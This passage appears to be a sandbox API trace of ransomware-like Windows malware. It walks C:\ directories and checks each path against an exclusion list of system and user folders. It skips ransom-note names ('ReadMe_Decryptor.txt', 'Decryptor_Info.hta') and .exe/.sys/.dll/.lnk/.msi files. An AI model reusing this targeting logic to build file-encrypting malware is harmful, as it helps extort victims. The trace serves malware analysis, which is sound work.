(lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="C:\\Qt") returned -1 [0105.005] lstrcmpiW (lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="C:\\ProgramData") returned -1 [0105.005] lstrcmpiW (lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="C:\\Program Files") returned -1 [0105.005] lstrcmpiW (lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="C:\\Windows") returned -1 [0105.005] lstrcmpiW (lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="C:\\Program Files (x86)") returned -1 [0105.005] lstrcatW (in: lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="\\" | out: lpString1="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0105.005] lstrlenW (lpString="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 63 [0105.005] FindFirstFileExW (in: lpFileName="C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72abb8 [0105.006] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0105.006] FindNextFileW (in: hFindFile=0x72abb8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0105.175] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0105.175] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0105.175] FindNextFileW (in: hFindFile=0x72abb8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0105.175] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0105.175] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0105.175] lstrcmpiW (lpString1="desktop.ini", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.175] lstrcmpiW (lpString1="desktop.ini", lpString2="Decryptor_Info.hta") returned 1 [0105.175] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0105.175] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0105.175] lstrcmpiW (lpString1=".ini", lpString2=".sys") returned -1 [0105.176] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0105.176] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0105.176] lstrcmpiW (lpString1=".ini", lpString2=".msi") returned -1 [0105.176] FindNextFileW (in: hFindFile=0x72abb8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0105.176] FindClose (in: hFindFile=0x72abb8 | out: hFindFile=0x72abb8) returned 1 [0105.176] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0105.176] FindClose (in: hFindFile=0x72a788 | out: hFindFile=0x72a788) returned 1 [0105.179] FindNextFileW (in: hFindFile=0x6e93f8, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0105.181] lstrcmpW (lpString1="Boot", lpString2=".") returned 1 [0105.181] lstrcmpW (lpString1="Boot", lpString2="..") returned 1 [0105.181] lstrlenW (lpString="Boot") returned 4 [0105.181] lstrcatW (in: lpString1="C:\\", lpString2="Boot" | out: lpString1="C:\\Boot") returned="C:\\Boot" [0105.181] lstrcmpiW (lpString1="C:\\Boot", lpString2="C:\\Windows") returned -1 [0105.181] lstrcmpiW (lpString1="C:\\Boot", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0105.181] lstrcmpiW (lpString1="C:\\Boot", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0105.181] lstrcmpiW (lpString1="C:\\Boot", lpString2="C:\\ProgramData") returned -1 [0105.181] lstrcmpiW (lpString1="C:\\Boot", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0105.181] lstrcmpiW (lpString1="C:\\Boot", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0105.181] lstrcmpiW (lpString1="C:\\Boot", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0105.181] lstrcmpiW (lpString1="C:\\Boot", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0105.181] lstrcmpiW (lpString1="C:\\Boot", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0105.181] lstrcmpiW (lpString1="C:\\Boot", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0105.182] lstrcmpiW (lpString1="C:\\Boot", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0105.182] lstrcmpiW (lpString1="C:\\Boot", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0105.182] lstrcmpiW (lpString1="C:\\Boot", lpString2="C:\\Intel") returned -1 [0105.182] lstrcmpiW (lpString1="C:\\Boot", lpString2="C:\\msys32") returned -1 [0105.182] lstrcmpiW (lpString1="C:\\Boot", lpString2="C:\\Qt") returned -1 [0105.182] lstrcmpiW (lpString1="C:\\Boot", lpString2="C:\\ProgramData") returned -1 [0105.182] lstrcmpiW (lpString1="C:\\Boot", lpString2="C:\\Program Files") returned -1 [0105.182] lstrcmpiW (lpString1="C:\\Boot", lpString2="C:\\Windows") returned -1 [0105.182] lstrcmpiW (lpString1="C:\\Boot", lpString2="C:\\Program Files (x86)") returned -1 [0105.182] lstrcatW (in: lpString1="C:\\Boot", lpString2="\\" | out: lpString1="C:\\Boot\\") returned="C:\\Boot\\" [0105.182] lstrlenW (lpString="C:\\Boot\\") returned 8 [0105.182] FindFirstFileExW (in: lpFileName="C:\\Boot\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x72a788 [0105.182] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0105.182] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0105.184] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0105.184] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0105.184] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x90cd45e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x90cd45e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD", cAlternateFileName="")) returned 1 [0105.184] lstrcmpW (lpString1="BCD", lpString2=".") returned 1 [0105.184] lstrcmpW (lpString1="BCD", lpString2="..") returned 1 [0105.184] lstrcmpiW (lpString1="BCD", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.184] lstrcmpiW (lpString1="BCD", lpString2="Decryptor_Info.hta") returned -1 [0105.184] PathFindExtensionW (pszPath="BCD") returned="" [0105.184] lstrcmpiW (lpString1="", lpString2=".exe") returned -1 [0105.184] lstrcmpiW (lpString1="", lpString2=".sys") returned -1 [0105.184] lstrcmpiW (lpString1="", lpString2=".lnk") returned -1 [0105.184] lstrcmpiW (lpString1="", lpString2=".dll") returned -1 [0105.184] lstrcmpiW (lpString1="", lpString2=".msi") returned -1 [0105.184] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x7063a8 [0105.184] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x7063d0 [0105.185] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7063a8 | out: hHeap=0x6d0000) returned 1 [0105.185] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac2e8a60, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac2e8a60, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x9098e7a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5400, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG", cAlternateFileName="")) returned 1 [0105.185] lstrcmpW (lpString1="BCD.LOG", lpString2=".") returned 1 [0105.185] lstrcmpW (lpString1="BCD.LOG", lpString2="..") returned 1 [0105.185] lstrcmpiW (lpString1="BCD.LOG", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.185] lstrcmpiW (lpString1="BCD.LOG", lpString2="Decryptor_Info.hta") returned -1 [0105.185] PathFindExtensionW (pszPath="BCD.LOG") returned=".LOG" [0105.185] lstrcmpiW (lpString1=".LOG", lpString2=".exe") returned 1 [0105.185] lstrcmpiW (lpString1=".LOG", lpString2=".sys") returned -1 [0105.185] lstrcmpiW (lpString1=".LOG", lpString2=".lnk") returned 1 [0105.185] lstrcmpiW (lpString1=".LOG", lpString2=".dll") returned 1 [0105.185] lstrcmpiW (lpString1=".LOG", lpString2=".msi") returned -1 [0105.185] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG1", cAlternateFileName="BCD~1.LOG")) returned 1 [0105.185] lstrcmpW (lpString1="BCD.LOG1", lpString2=".") returned 1 [0105.185] lstrcmpW (lpString1="BCD.LOG1", lpString2="..") returned 1 [0105.185] lstrcmpiW (lpString1="BCD.LOG1", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.185] lstrcmpiW (lpString1="BCD.LOG1", lpString2="Decryptor_Info.hta") returned -1 [0105.185] PathFindExtensionW (pszPath="BCD.LOG1") returned=".LOG1" [0105.185] lstrcmpiW (lpString1=".LOG1", lpString2=".exe") returned 1 [0105.185] lstrcmpiW (lpString1=".LOG1", lpString2=".sys") returned -1 [0105.185] lstrcmpiW (lpString1=".LOG1", lpString2=".lnk") returned 1 [0105.185] lstrcmpiW (lpString1=".LOG1", lpString2=".dll") returned 1 [0105.185] lstrcmpiW (lpString1=".LOG1", lpString2=".msi") returned -1 [0105.186] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac30ebc0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="BCD.LOG2", cAlternateFileName="BCD~2.LOG")) returned 1 [0105.186] lstrcmpW (lpString1="BCD.LOG2", lpString2=".") returned 1 [0105.186] lstrcmpW (lpString1="BCD.LOG2", lpString2="..") returned 1 [0105.186] lstrcmpiW (lpString1="BCD.LOG2", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.186] lstrcmpiW (lpString1="BCD.LOG2", lpString2="Decryptor_Info.hta") returned -1 [0105.186] PathFindExtensionW (pszPath="BCD.LOG2") returned=".LOG2" [0105.186] lstrcmpiW (lpString1=".LOG2", lpString2=".exe") returned 1 [0105.186] lstrcmpiW (lpString1=".LOG2", lpString2=".sys") returned -1 [0105.186] lstrcmpiW (lpString1=".LOG2", lpString2=".lnk") returned 1 [0105.186] lstrcmpiW (lpString1=".LOG2", lpString2=".dll") returned 1 [0105.186] lstrcmpiW (lpString1=".LOG2", lpString2=".msi") returned -1 [0105.186] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSTAT.DAT", cAlternateFileName="")) returned 1 [0105.186] lstrcmpW (lpString1="BOOTSTAT.DAT", lpString2=".") returned 1 [0105.186] lstrcmpW (lpString1="BOOTSTAT.DAT", lpString2="..") returned 1 [0105.186] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.186] lstrcmpiW (lpString1="BOOTSTAT.DAT", lpString2="Decryptor_Info.hta") returned -1 [0105.186] PathFindExtensionW (pszPath="BOOTSTAT.DAT") returned=".DAT" [0105.186] lstrcmpiW (lpString1=".DAT", lpString2=".exe") returned -1 [0105.186] lstrcmpiW (lpString1=".DAT", lpString2=".sys") returned -1 [0105.186] lstrcmpiW (lpString1=".DAT", lpString2=".lnk") returned -1 [0105.186] lstrcmpiW (lpString1=".DAT", lpString2=".dll") returned -1 [0105.186] lstrcmpiW (lpString1=".DAT", lpString2=".msi") returned -1 [0105.186] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0105.186] lstrcmpW (lpString1="cs-CZ", lpString2=".") returned 1 [0105.187] lstrcmpW (lpString1="cs-CZ", lpString2="..") returned 1 [0105.187] lstrlenW (lpString="cs-CZ") returned 5 [0105.187] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="cs-CZ" | out: lpString1="C:\\Boot\\cs-CZ") returned="C:\\Boot\\cs-CZ" [0105.187] lstrcmpiW (lpString1="C:\\Boot\\cs-CZ", lpString2="C:\\Windows") returned -1 [0105.187] lstrcmpiW (lpString1="C:\\Boot\\cs-CZ", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0105.187] lstrcmpiW (lpString1="C:\\Boot\\cs-CZ", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0105.187] lstrcmpiW (lpString1="C:\\Boot\\cs-CZ", lpString2="C:\\ProgramData") returned -1 [0105.187] lstrcmpiW (lpString1="C:\\Boot\\cs-CZ", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0105.187] lstrcmpiW (lpString1="C:\\Boot\\cs-CZ", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0105.187] lstrcmpiW (lpString1="C:\\Boot\\cs-CZ", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0105.187] lstrcmpiW (lpString1="C:\\Boot\\cs-CZ", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0105.187] lstrcmpiW (lpString1="C:\\Boot\\cs-CZ", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0105.187] lstrcmpiW (lpString1="C:\\Boot\\cs-CZ", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0105.187] lstrcmpiW (lpString1="C:\\Boot\\cs-CZ", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0105.187] lstrcmpiW (lpString1="C:\\Boot\\cs-CZ", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0105.187] lstrcmpiW (lpString1="C:\\Boot\\cs-CZ", lpString2="C:\\Intel") returned -1 [0105.187] lstrcmpiW (lpString1="C:\\Boot\\cs-CZ", lpString2="C:\\msys32") returned -1 [0105.187] lstrcmpiW (lpString1="C:\\Boot\\cs-CZ", lpString2="C:\\Qt") returned -1 [0105.187] lstrcmpiW (lpString1="C:\\Boot\\cs-CZ", lpString2="C:\\ProgramData") returned -1 [0105.187] lstrcmpiW (lpString1="C:\\Boot\\cs-CZ", lpString2="C:\\Program Files") returned -1 [0105.187] lstrcmpiW (lpString1="C:\\Boot\\cs-CZ", lpString2="C:\\Windows") returned -1 [0105.187] lstrcmpiW (lpString1="C:\\Boot\\cs-CZ", lpString2="C:\\Program Files (x86)") returned -1 [0105.187] lstrcatW (in: lpString1="C:\\Boot\\cs-CZ", lpString2="\\" | out: lpString1="C:\\Boot\\cs-CZ\\") returned="C:\\Boot\\cs-CZ\\" [0105.187] lstrlenW (lpString="C:\\Boot\\cs-CZ\\") returned 14 [0105.188] FindFirstFileExW (in: lpFileName="C:\\Boot\\cs-CZ\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77e610 [0105.322] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0105.322] FindNextFileW (in: hFindFile=0x77e610, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0105.322] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0105.322] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0105.323] FindNextFileW (in: hFindFile=0x77e610, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0105.323] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0105.323] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0105.323] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.323] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Decryptor_Info.hta") returned -1 [0105.323] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0105.323] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0105.323] lstrcmpiW (lpString1=".mui", lpString2=".sys") returned -1 [0105.323] lstrcmpiW (lpString1=".mui", lpString2=".lnk") returned 1 [0105.323] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0105.323] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0105.323] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x7063f8 [0105.323] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e7558 [0105.323] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7063f8 | out: hHeap=0x6d0000) returned 1 [0105.323] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x6e75a0 [0105.323] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7558 | out: hHeap=0x6d0000) returned 1 [0105.323] FindNextFileW (in: hFindFile=0x77e610, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0105.323] FindClose (in: hFindFile=0x77e610 | out: hFindFile=0x77e610) returned 1 [0105.323] FindNextFileW (in: hFindFile=0x72a788, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0105.323] lstrcmpW (lpString1="da-DK", lpString2=".") returned 1 [0105.324] lstrcmpW (lpString1="da-DK", lpString2="..") returned 1 [0105.324] lstrlenW (lpString="da-DK") returned 5 [0105.324] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="da-DK" | out: lpString1="C:\\Boot\\da-DK") returned="C:\\Boot\\da-DK" [0105.324] lstrcmpiW (lpString1="C:\\Boot\\da-DK", lpString2="C:\\Windows") returned -1 [0105.324] lstrcmpiW (lpString1="C:\\Boot\\da-DK", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0105.324] lstrcmpiW (lpString1="C:\\Boot\\da-DK", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned -1 [0105.324] lstrcmpiW (lpString1="C:\\Boot\\da-DK", lpString2="C:\\ProgramData") returned -1 [0105.324] lstrcmpiW (lpString1="C:\\Boot\\da-DK", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned -1 [0105.324] lstrcmpiW (lpString1="C:\\Boot\\da-DK", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned -1 [0105.324] lstrcmpiW (lpString1="C:\\Boot\\da-DK", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned -1 [0105.324] lstrcmpiW (lpString1="C:\\Boot\\da-DK", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned -1 [0105.324] lstrcmpiW (lpString1="C:\\Boot\\da-DK", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0105.324] lstrcmpiW (lpString1="C:\\Boot\\da-DK", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0105.324] lstrcmpiW (lpString1="C:\\Boot\\da-DK", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0105.324] lstrcmpiW (lpString1="C:\\Boot\\da-DK", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0105.324] lstrcmpiW (lpString1="C:\\Boot\\da-DK", lpString2="C:\\Intel") returned -1 [0105.324] lstrcmpiW (lpString1="C:\\Boot\\da-DK", lpString2="C:\\msys32") returned -1 [0105.324] lstrcmpiW (lpString1="C:\\Boot\\da-DK", lpString2="C:\\Qt") returned -1 [0105.324] lstrcmpiW (lpString1="C:\\Boot\\da-DK", lpString2="C:\\ProgramData") returned -1 [0105.324] lstrcmpiW (lpString1="C:\\Boot\\da-DK", lpString2="C:\\Program Files") returned -1 [0105.324] lstrcmpiW (lpString1="C:\\Boot\\da-DK", lpString2="C:\\Windows") returned -1 [0105.324] lstrcmpiW (lpString1="C:\\Boot\\da-DK", lpString2="C:\\Program Files (x86)") returned -1 [0105.324] lstrcatW (in: lpString1="C:\\Boot\\da-DK", lpString2="\\" | out: lpString1="C:\\Boot\\da-DK\\") returned="C:\\Boot\\da-DK\\" [0105.324] lstrlenW (lpString="C:\\Boot\\da-DK\\") returned 14 [0105.325] FindFirstFileExW (in: lpFileName="C:\\Boot\\da-DK\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77e610 [0105.325] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0105.325] FindNextFileW (in: hFindFile=0x77e610, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0105.325] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0105.325] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0105.325] 